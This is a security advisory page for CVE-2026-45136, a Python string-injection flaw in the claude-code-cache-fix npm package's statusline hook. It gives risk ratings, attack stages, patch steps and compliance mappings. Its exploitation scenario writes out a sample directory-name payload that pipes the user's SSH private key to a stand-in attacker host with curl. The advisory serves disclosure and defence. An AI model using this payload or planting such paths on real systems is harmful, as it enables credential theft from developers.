CVE-2026-45136: claude-code-cache-fix: hook path injection → RCE

GHSA-g3xq-3gmv-qq8g HIGH CISA: TRACK*
Published May 13, 2026
CISO Take

CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

HIGH. While no remote vector exists, the delivery mechanism is trivial — any git repository, npm package, or archive can plant a hostile directory name. Exploitation requires zero specialized knowledge: crafting the payload is a one-liner, and the attack self-sustains on every terminal redraw without further adversary involvement. The target population is AI developers whose machines hold SSH keys, LLM API tokens (Anthropic, OpenAI), cloud provider credentials, and proprietary model artifacts — extremely high-value targets for supply chain actors. Six prior CVEs exist in the same package, suggesting this tool has a weak security track record.

How does the attack unfold?

Initial Access
Attacker publishes a malicious npm package or git repository containing a directory whose name embeds a Python triple-quote injection payload.
AML.T0010.001
Delivery
Developer performs a routine npm install, git clone, or archive extraction, landing the hostile directory path on their local filesystem.
AML.T0011
Exploitation
Developer navigates their terminal; Claude Code fires the statusline hook, passing the hostile path into a Python triple-quoted string that closes early and executes the injected payload.
AML.T0050
Impact
Attacker achieves persistent code execution at user privilege on every statusline redraw, enabling silent exfiltration of SSH keys, API tokens, cloud credentials, and full machine compromise.
AML.T0112.000

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Claude Code npm >= 3.5.0, < 3.5.2 3.5.2
134.7K Pushed 7d ago 73% patched ~2d to patch Full package profile →

Do you use Claude Code? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
0.2%
chance of exploitation in 30 days
Higher than 9% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What should I do?

5 steps
  1. Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely.

  2. Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible.

  3. Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation).

  4. Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh.

  5. Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.10.4 - Security by design
NIST AI RMF
MANAGE 2.2 - Mechanisms to sustain and update AI risk management plans
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-45136?

CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.

Is CVE-2026-45136 actively exploited?

No confirmed active exploitation of CVE-2026-45136 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45136?

1. Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely. 2. Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible. 3. Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation). 4. Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh. 5. Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.

What systems are affected by CVE-2026-45136?

This vulnerability affects the following AI/ML architecture patterns: AI development environments, Agent frameworks, AI coding assistants.

What is the CVSS score for CVE-2026-45136?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI development environmentsAgent frameworksAI coding assistants

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.005 AI Agent Tool
AML.T0011 User Execution
AML.T0050 Command and Scripting Interpreter
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.10.4
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM07

What are the technical details?

Original Advisory

claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2.

Exploitation Scenario

An attacker contributes to or publishes an open-source AI project (npm package, GitHub repo, or sample dataset archive) that includes a directory named with a crafted payload such as: 'payload_dir/\'''+__import__(\"os\").popen(\"cat ~/.ssh/id_rsa | curl -d @- attacker.com\").read()+\''''. A developer on v3.5.0 or v3.5.1 installs or clones the project as part of normal AI development workflow. The moment the developer navigates their terminal to any workspace where the hostile path appears in cwd, workspace.current_dir, workspace.project_dir, or transcript_path fields of the hook payload, Claude Code fires the statusline hook. Python interprets the injected bytes as code, silently exfiltrates the developer's SSH private key, and the payload continues executing on every subsequent terminal redraw for the entire session.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

Timeline

Published
May 13, 2026
Last Modified
June 2, 2026
First Seen
May 13, 2026

Related Vulnerabilities